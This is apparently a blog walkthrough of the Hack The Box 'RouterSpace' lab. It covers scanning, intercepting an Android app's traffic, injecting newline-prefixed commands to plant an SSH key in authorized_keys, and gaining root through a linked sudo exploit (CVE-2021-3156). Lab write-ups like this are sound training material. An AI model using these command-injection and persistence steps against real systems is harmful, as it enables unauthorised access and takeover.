Hi guys, welcome to my blog so today we are going to discuss an interesting machine which is Routerspace this is the machine that comes with the Rce Vulnerability and escalates the root privilege with the sudo version.
- Nmap scan
- Genymotion for APK testing
- Rce — Remote code Execution
- Getting the User shell
- Root Privilege Escalation
- Run linPEAS
- Sudo Version Vulnerability
- Getting the Root shell
Nmap scan
So first Let we start with Nmap Scan
STEP 1: nmap -sC -sV 10.10.11.148
Further analyzing this nmap scan I have found a normal SSH service.
So next we go took at the website which is http://10.10.11.148
Here you can able see the download option on the top right corner
Download that apk file…
Genymotion for Apk testing
And next, we going to set up the genymotion for apk testing. Insert using Genymotion you can able to use the Anbox or Nox player for that.
First I have test with Anbox but it was not suitable for my Linux and throws lots of errors so I used Genymotion and I used it for a Lot of Time for testing the android application.
Download the Genymotion using this link: https://genymotion.com
With that download the VirtualBox also: https://virtualbox.org
After downloading this. Download any android Machine with the older version of 5.0 or 5.1
If you’ve tried with newer version 9.1 or 10 it will not work. I throw the server error.
Because I have been stuck at this stage for 2 days and I get the idea from the hack-the-box forums
From this, I have learned the lesson which is “ Failure is not the opposite of success it is part of success” and I still kept my trying without losing hope in searching. I say this for you guys .. Still, Keep trying one day you will reach success.
Let us move on to the content.
After downloading the android machine use the adb command to install the apk on the machine.
STEP 2: adb install Routerspace.apk
So now the app will be installed on your android machine
And next, we going to set the proxy to intercept the requested using the burpsuite
And next, open the burpsuite and go to proxy the tab.
Here you can able see the options tab.
And the Add button which is on the left.
First, It will ask you to Enter the bind port as 4001 and choose your machine IP (tun0)
And check the box ( shown in the below image )
Next, we going to set the proxy for the android machine using the below command
STEP 3: adb shell settings put global http_proxy brup:ip
Now turn off your intercept in your burpsuite and click the check status button in your android app.
Now it will say “Hey the router working fine”
So next we going to intercept the request in the burpsuite.
Now you can able see the hostname which is routerspace.htb. add the host to your /etc/hosts file
And next repeat the request and intercept in your burpsuite and send it to the repeater.
RCE
Further analyzing I found that it was affected by remote code execution
So first I tried “id”
So let us try another to bypass “\nid”
It’s worked now we have found the user is paul. so further I have tried a lot but it was blocked due to the iptable rule.
So let us check for the ssh key
STEP 4: \nls -al /home/paul/.ssh
There is nothing available. so I have generated the ssh key to get a login.
STEP 5: ssh-keygen
STEP 6: cd /root/.ssh
Now you can able see the id_rsa.pub
STEP 7: cat id_rsa.pub
copy that id_rsa.pub key
STEP 8: \necho ‘paste your key here’ >> /home/paul/.ssh/authorized_keys
Now send this request
And go to your local machine in the nmap we have found the ssh service so let us log in through it.
Before that give permission to your RSA file
STEP 9: chmod 600 id_rsa
STEP 10: ssh -i id_rsa paul@10.10.11.148
Now you get the user shell
boooooooooooooooooooooooommmmmm!!!!!
You can able to see the userflag which is user.txt
STEP 11: cat user.txt
Root Privilege Escalation
First, we going to run the linpeas script
STEP 12: ./linpeas.sh
Further analyzing this report I have found that It was affected by the sudo version
So now we going to escalate privilege using this sudo version
CVE 2021–3156
Link: https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py
Download this exploit in the routerspace machine
Run this exploit you will get the root shell
Booooooooooooooooommmmmmmm!!!!
STEP 13: cd root
STEP 14: cat root.txt
Now you can able to get the root flag.
I hope you will understand this article please support us
OSCP Student:
